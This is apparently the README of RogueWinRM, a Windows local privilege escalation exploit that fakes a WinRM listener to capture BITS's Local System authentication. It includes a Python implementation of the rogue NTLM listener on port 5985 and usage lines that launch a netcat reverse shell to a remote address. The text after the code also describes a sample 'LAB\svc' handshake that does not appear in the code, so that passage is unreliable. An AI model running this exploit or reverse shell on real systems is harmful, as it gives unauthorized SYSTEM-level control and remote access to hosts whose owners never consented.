RogueWinRM – Windows Local Privilege Escalation From Service Account To System

RogueWinRM is a local privilege escalation exploit that allows escalating from a service account (one holding SeImpersonatePrivilege) to the Local System account when the WinRM service is not running. That is the default on Windows 10, but NOT on Windows Server 2019, where the WinRM service runs by default and already owns the port the exploit needs.

Briefly, it listens for incoming connections on port 5985, faking a real WinRM service.
It is actually just a minimal web server that tries to negotiate NTLM authentication with any service that attempts to connect to that port.
Then the BITS service (running as Local System) is triggered, and it tries to authenticate to our rogue listener. Once the service has authenticated to the rogue listener, we can impersonate the Local System user and spawn an arbitrary process with those privileges. Note that the prerequisites are both required: the current token must hold SeImpersonatePrivilege (otherwise the negotiated security context cannot be impersonated), and nothing else may already be bound to the listening port.
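The following is an added example, not code from RogueWinRM or from the original page, that shows the HTTP side of the handshake described above: round one answers with 401 and advertises Negotiate/NTLM, round two answers the client's NTLM Type 1 with a Type 2 challenge, and round three receives the Type 3 and decodes the domain, user and workstation the client claims. All NTLM messages here are constructed for the demonstration (the server challenge is a fixed fake value and the Type 3 carries empty challenge responses, so no NTLM crypto is involved); on Windows the real tool obtains the Type 2 from SSPI and, after SSPI accepts the Type 3, the caller's token, which is the step this offline code cannot perform. Function names such as handle_request and build_type3 are this example's own.

```python
import base64
import socket
import struct
from typing import Optional, Tuple

NTLMSSP = b"NTLMSSP\x00"
NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE = 1, 2, 3
FLAG_UNICODE = 0x00000001
# Constructed challenge for this offline demo only. The real listener never picks
# it: SSPI (AcceptSecurityContext) builds the Type 2 and, once the client's Type 3
# is accepted, hands back the token that is then impersonated.
FAKE_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")

def ntlm_message_type(blob: bytes) -> int:
    """Return 1/2/3 for an NTLMSSP message, 0 for anything else."""
    if len(blob) < 12 or blob[:8] != NTLMSSP:
        return 0
    return struct.unpack_from("<I", blob, 8)[0]

def build_type1() -> bytes:
    """Constructed NEGOTIATE_MESSAGE (what the client sends first); 32 bytes."""
    return NTLMSSP + struct.pack("<II", NTLM_NEGOTIATE, FLAG_UNICODE) + struct.pack("<HHI", 0, 0, 32) * 2

def build_type2(challenge: bytes = FAKE_SERVER_CHALLENGE) -> bytes:
    """Minimal CHALLENGE_MESSAGE: empty target name and target info, payload at 48."""
    return (NTLMSSP + struct.pack("<I", NTLM_CHALLENGE)
            + struct.pack("<HHI", 0, 0, 48)            # TargetNameFields
            + struct.pack("<I", FLAG_UNICODE | 0x200)  # NEGOTIATE_UNICODE | NEGOTIATE_NTLM
            + challenge + b"\x00" * 8                  # ServerChallenge, Reserved
            + struct.pack("<HHI", 0, 0, 48))           # TargetInfoFields

def build_type3(domain: str, user: str, workstation: str) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE with empty challenge responses (no NTLM crypto)."""
    msg = NTLMSSP + struct.pack("<I", NTLM_AUTHENTICATE) + struct.pack("<HHI", 0, 0, 64) * 2
    payload = b""
    for text in (domain, user, workstation):
        enc = text.encode("utf-16-le")
        msg += struct.pack("<HHI", len(enc), len(enc), 64 + len(payload))
        payload += enc
    msg += struct.pack("<HHI", 0, 0, 64 + len(payload)) + struct.pack("<I", FLAG_UNICODE)
    return msg + payload

def _field(blob: bytes, off: int) -> bytes:
    length, _maxlen, start = struct.unpack_from("<HHI", blob, off)
    return blob[start:start + length]

def parse_type3(blob: bytes) -> dict:
    """Domain, user and workstation claimed in a Type 3 (fields at 28/36/44, flags at 60)."""
    if ntlm_message_type(blob) != NTLM_AUTHENTICATE:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    enc = "utf-16-le" if struct.unpack_from("<I", blob, 60)[0] & FLAG_UNICODE else "ascii"
    return {name: _field(blob, off).decode(enc)
            for name, off in (("domain", 28), ("user", 36), ("workstation", 44))}

def _headers(raw: bytes) -> dict:
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1").split("\r\n")[1:]
    return {k.strip().lower(): v.strip() for k, _, v in (line.partition(":") for line in head)}

def _response(status: str, extra: list, body: bytes = b"") -> bytes:
    lines = ["HTTP/1.1 " + status, *extra, "Content-Length: %d" % len(body), "", ""]
    return "\r\n".join(lines).encode() + body

def authorization_header(blob: bytes) -> str:
    return "Authorization: NTLM " + base64.b64encode(blob).decode()

def challenge_from_response(resp: bytes) -> Optional[bytes]:
    """What a client does with our 401: pull the Type 2 out of WWW-Authenticate."""
    for line in resp.split(b"\r\n"):
        parts = line.split(b" ")
        if line.startswith(b"WWW-Authenticate:") and len(parts) == 3:
            return base64.b64decode(parts[2])
    return None

def handle_request(raw: bytes) -> Tuple[bytes, Optional[dict]]:
    """One HTTP round of the rogue listener; the dict is set once a Type 3 arrives."""
    scheme, _, token = _headers(raw).get("authorization", "").partition(" ")
    if scheme.lower() not in ("negotiate", "ntlm") or not token:
        # Round 1: no credentials yet, advertise the schemes the fake WinRM accepts.
        return _response("401 Unauthorized", ["WWW-Authenticate: Negotiate", "WWW-Authenticate: NTLM"]), None
    blob = base64.b64decode(token)
    mtype = ntlm_message_type(blob)  # SPNEGO-wrapped Negotiate tokens are not unwrapped here
    if mtype == NTLM_NEGOTIATE:
        # Round 2: answer the Type 1 with our Type 2 under the scheme the client chose.
        b64 = base64.b64encode(build_type2()).decode()
        return _response("401 Unauthorized", ["WWW-Authenticate: %s %s" % (scheme, b64)]), None
    if mtype == NTLM_AUTHENTICATE:
        # Round 3: the client has committed. On Windows this blob goes to SSPI, which
        # returns the caller's token; here we can only decode what the client claims.
        return _response("200 OK", [], b"ok"), parse_type3(blob)
    return _response("400 Bad Request", []), None

def serve(port: int = 5985) -> None:
    """Stand-alone listener (one request per recv); prints who completed the handshake."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        while True:
            conn, peer = srv.accept()
            with conn:
                for data in iter(lambda: conn.recv(65536), b""):
                    resp, who = handle_request(data)
                    conn.sendall(resp)
                    if who:
                        print("Type 3 from", peer, "->", who)

if __name__ == "__main__":
    serve()
```

Running the module binds port 5985 and prints the identity claimed in any Type 3 that reaches it; the Type 3 in the sample handshake is a fabricated client message, so the decoded "LAB\svc" it yields is whatever the constructed message says, not a verified identity, which is exactly why the real exploit relies on SSPI to validate the exchange and return a token.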

You can find a full technical description of this vulnerability at this url --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

Usage

RogueWinRM

Mandatory args:
-p : program to launch

Optional args:
-a : command line argument to pass to the program (default NULL)
-l : listening port (default 5985, the WinRM port; use another value only if you can redirect the triggered client to it)
-d : enable debugging output

Examples

Running an interactive cmd:

RogueWinRM.exe -p C:\windows\system32\cmd.exe

Running a netcat reverse shell:

RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10...1 3001 -e cmd"

Authors
